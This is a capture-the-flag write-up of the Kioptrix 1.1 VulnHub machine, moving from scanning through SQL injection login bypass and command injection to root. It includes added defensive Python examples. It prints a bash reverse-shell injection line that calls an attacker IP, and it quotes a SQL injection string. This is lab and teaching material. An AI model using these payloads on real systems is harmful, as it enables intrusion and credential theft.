Kioptrix 1.1 (lvl2)

mrZud0k0rn
7 min read · Nov 25, 2020


Let’s try to learn something from this old machine. Download the VM from the VulnHub website, unzip it and load it up in our hypervisor.

This was supposed to be an easy one and a great complement to our Kioptrix level 1. Let’s begin.

Discover the IP of our target using arp-scan.

root@kali:~/Desktop/Kioptrix/kioptrix1.1# arp-scan 192.168.1.0/24
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:42:a0, IPv4: 192.168.1.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.1.15 00:0c:29:51:16:71 VMware, Inc.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.045 seconds (125.18 hosts/sec). 8 responded

According to our scan, our target resides at 192.168.1.15. From there, let’s discover the open ports with an nmap scan of all ports (-p-), saving the output to nmap/portScan (the -oN output flag is assumed here; the original command line omitted it):

nmap -p- -oN nmap/portScan 192.168.1.15

The result showed that our target has 7 open ports. Let’s run a more detailed version scan (-sV) of nmap against those ports.

So, based on our detailed scan, we have the following:

port 22 — OpenSSH version 3.9p1 with protocol 1.99

port 80/443 — Apache httpd web server version 2.0.52; it also exposes the Linux distribution, CentOS

ports 111 and 988 — rpcbind

port 631 — runs the IPP protocol using the CUPS application, version 1.1

port 3306 — a MySQL database

As part of our enumeration, we can do a quick Google search for public disclosures against the versions we have scanned.

Enumeration

Based on my experience, ports 22, 80/443 and 3306 are our interesting ports. Perhaps we can find credentials (a username and password) carelessly left on port 80/443, use them to log in to the MySQL database on port 3306, then dump credentials that we can use to log in remotely over SSH on port 22.

But that was just me getting ahead of myself and my methodology again.

Now, let’s enumerate port 80/443.

Port 80/443

1. Running the http-enum script of nmap

We got the same web app and OS, plus some potential open directories. We can enumerate directories with gobuster against this port.

2. Running http-comments-displayer to check if there are comments left by devs

So far, it seems that we don’t have any juicy comments other than a potential username, “Administrator”.

3. Running a nikto web app scan to check for potential vulnerabilities

Nikto doesn’t seem to give us an interesting result either, other than the PHP version the web app is using. Let’s now try to bust web app directories.

4. Running gobuster to discover files and directories

dir — denotes that we are looking for files and directories

-u (url) — our target URL

-w — the path to our wordlist

-x — the file extensions we are looking for

-s — the server response codes we are interested in (200, 204, 302, etc.)

So far, we have gathered the following information to help us further:

  • Apache/2.0.52
  • CentOS
  • PHP 4.3.0

5. Visiting the page using a web browser

We got a System Admin login page. Since we have no credentials yet other than the username “Administrator” with no password, we can try to brute-force our way in. I tried various common default passwords like admin, password, root, etc., but none of them worked.

After trying possible default credentials, we now try SQL injection.

Googling “mysql injection cheatsheet” brought us to a site, and I tried the following.

We intercept the login request in Burp and load the injections above as our payloads in Burp Intruder.

Run the Intruder attack and compare the response lengths; notice that the length of 779 shows which injections worked against our target. So, we have 4 ways to log in to the system using SQL injection.
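The bypass works because the login page splices the submitted field straight into its SQL string, so a quote in the username becomes SQL syntax. As an added example (not the Kioptrix application’s code), here is the same login check done both ways in Python against an in-memory SQLite table with a constructed account; the table name, columns and password are my own assumptions, not values from the box.

```python
"""Login check built by string formatting (the bug class above) beside a
parameterized version. Added example; schema and account are constructed."""
import hashlib
import hmac
import sqlite3

ADMIN_USER = "Administrator"
ADMIN_PASSWORD = "constructed-example-password"  # constructed, not from the VM


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 (ADMIN_USER, sha256_hex(ADMIN_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query assembled with %-formatting: whatever the user types becomes part
    of the SQL text, so a quote followed by OR 1=1 and a comment marker turns
    the WHERE clause into 'always true'. Kept only to contrast with the fix."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, sha256_hex(password)))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized lookup: the driver sends the username as data, never as
    SQL. The password hash is compared in code, in constant time."""
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    candidate = sha256_hex(password)
    if row is None:
        # Burn the same comparison for an unknown user so timing does not
        # reveal whether the account exists.
        hmac.compare_digest(candidate, sha256_hex(""))
        return False
    return hmac.compare_digest(row[0], candidate)


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1 -- "  # textbook cheat-sheet string, used here as the test input
    print("vulnerable:", login_vulnerable(db, probe, "x"))  # True: bypassed
    print("safe:      ", login_safe(db, probe, "x"))        # False: rejected
```

The Burp length difference the post relies on shows up here as the difference between the two return values: the formatted query returns a row for the probe string, the parameterized one does not, because the placeholder keeps the quote inside the value.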

The page shows a single input and a submit button, and all it seems to do is ping whatever you enter in the input.

Let’s try to ping home.

So basically, the app takes your input, ‘executes’ a ping against it and shows the result on a PHP page. Perhaps we can chain multiple commands on one line here: other than the ping command, maybe we can run ‘ls’, ‘cat’, ‘pwd’, ‘whoami’, etc. How? By simply using shell ‘operators’ like ‘&&’, ‘;’, ‘|’, etc.

Let’s check if this box accepts multiple commands on one line.

And it does!
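The operators work because the page hands the field to a shell as one string. As an added example (not the Kioptrix PHP page, whose source we never see), here is a ping handler written the broken way beside a hardened one in Python: the hardened version only accepts an address or hostname and passes it to ping as a single argv element, so no shell ever parses it. Function names, the metacharacter list and the ping options are my own assumptions.

```python
"""Ping handler: shell-string version beside an argv + allowlist version.
Added example; nothing here is taken from the target application."""
import ipaddress
import re
import subprocess

# Characters that let one field carry more than one command once it reaches sh.
SHELL_METACHARS = set(";&|`$<>()\n\r")

# RFC 1123 hostname: labels of alphanumerics and hyphens, no leading hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def find_shell_metachars(value: str) -> list:
    """Metacharacters present in the field, for the rejection log entry."""
    return sorted(c for c in SHELL_METACHARS if c in value)


def is_valid_target(value: str) -> bool:
    """Allowlist: a literal IPv4/IPv6 address or a hostname, nothing else.
    A denylist of operators would miss the next trick; this accepts only
    what a ping target can legitimately look like."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(value) is not None


def ping_command_vulnerable(target: str) -> str:
    """The broken pattern: the field spliced into a shell command line.
    Returned as text only, to show what the shell would receive."""
    return "ping -c 3 " + target


def build_ping_argv(target: str, count: int = 3) -> list:
    """argv list for subprocess: the target is exactly one argument and no
    shell is involved. Raises ValueError for anything outside the allowlist."""
    if not is_valid_target(target):
        raise ValueError("rejected target %r (shell metacharacters: %s)"
                         % (target, find_shell_metachars(target)))
    return ["ping", "-c", str(count), target]


def run_ping(target: str, timeout: int = 10) -> str:
    """Execute the validated argv without a shell and with a timeout."""
    argv = build_ping_argv(target)
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        return "ping binary not available on this host"
    except subprocess.TimeoutExpired:
        return "ping timed out"
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    for field in ("127.0.0.1", "127.0.0.1; id"):
        print(repr(field), "->", "valid" if is_valid_target(field) else
              "rejected %s" % find_shell_metachars(field))
```

The validator rejects the second field because of the `;` before anything is executed; with the argv form, even a field that slipped through would reach ping as a single hostname argument and fail to resolve rather than run.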

Let’s try to read /etc/passwd.

and we can!

We got root, john and harold as users with login shells. Instead of trying to crack the users’ passwords, since the input accepts multiple commands, let’s just try to send a reverse shell back to us.
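Picking the login-capable accounts out of /etc/passwd is something an administrator should do on their own hosts as well, to know which accounts can actually be used interactively. As an added example (not output from the VM), here is a small passwd parser in Python run over a constructed excerpt; the sample lines and the set of non-interactive shells are my own assumptions.

```python
"""Audit /etc/passwd for accounts that can log in interactively.
Added example over a constructed excerpt; not the target's real file."""

# Constructed sample in passwd format; UIDs and paths are made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
"""

# Shells that deny an interactive login (assumed list; extend per distro).
NON_INTERACTIVE_SHELLS = {
    "", "/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
    "/bin/sync", "/sbin/halt", "/sbin/shutdown",
}


def parse_passwd(text: str) -> list:
    """Parse passwd lines into dicts; malformed lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # passwd has exactly seven colon-separated fields
        name, pw, uid, gid, gecos, home, shell = fields
        try:
            uid_n, gid_n = int(uid), int(gid)
        except ValueError:
            continue
        accounts.append({
            "name": name, "uid": uid_n, "gid": gid_n, "gecos": gecos,
            "home": home, "shell": shell,
            # 'x' means the hash lives in /etc/shadow; anything else is a
            # legacy hash (or an empty field) sitting in world-readable passwd
            "shadowed": pw == "x",
        })
    return accounts


def interactive_accounts(text: str) -> list:
    """Names of accounts whose shell permits an interactive login."""
    return [a["name"] for a in parse_passwd(text)
            if a["shell"] not in NON_INTERACTIVE_SHELLS]


def uid_zero_accounts(text: str) -> list:
    """Any account with UID 0 is root, whatever it is called."""
    return [a["name"] for a in parse_passwd(text) if a["uid"] == 0]


def unshadowed_accounts(text: str) -> list:
    """Accounts whose password field is not the shadow marker 'x'."""
    return [a["name"] for a in parse_passwd(text) if not a["shadowed"]]


if __name__ == "__main__":
    print("interactive:", interactive_accounts(SAMPLE_PASSWD))
    print("uid 0:      ", uid_zero_accounts(SAMPLE_PASSWD))
```

On a real system, `uid_zero_accounts` and `unshadowed_accounts` are the two checks worth alarming on: a second UID 0 entry or a hash stored in passwd rather than shadow are both things an intruder leaves behind.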

1st try

2nd try

127.0.0.1 | bash -i >& /dev/tcp/192.168.43.39/4441 0>&1

So we got a shell as the apache user.

Let’s try to escalate our privileges from here. Let’s check the machine’s info; since this is quite an old machine, there are most likely public exploits available for our target.

Doing a simple system enumeration, we arrive at the following conclusion.

OS : CentOS release 4–4.3 / 4.5

Searching for publicly available exploits using searchsploit, we got a possible privilege escalation script that was tested against CentOS 4.4/4. Let’s copy it to our working directory and try to read it and learn how to use it.

It seems that for this exploit to work against our target, we need to transfer the raw .c file to the victim, compile it and run it.

Setting up our HTTP server using Python.

Let’s grab the .c file from our attacker machine using wget.

Compiling the file with gcc and running it inside the target machine.

And we got root!

Dumping the shadow file, we got john’s and harold’s credentials.

TAKEAWAYS

  1. Stick to your methodology. If I had solved this machine last year, I would probably have spent much more time than I spent today; my mind would have been glued to looking for the Admin password. Sticking to your methodology helps, not only in solving boxes but also in solidifying it further.
  2. Old stacks have publicly disclosed exploits. Since the machine is running old tech stacks, there is a high probability that exploits against those versions have already been disclosed; Google is my friend.

This is a pretty fun and straightforward box. For now, let’s do some more easy boxes just to sharpen our syntax familiarity and solidify our methodology, and probably we can crack medium to hard boxes in the first month of next year.
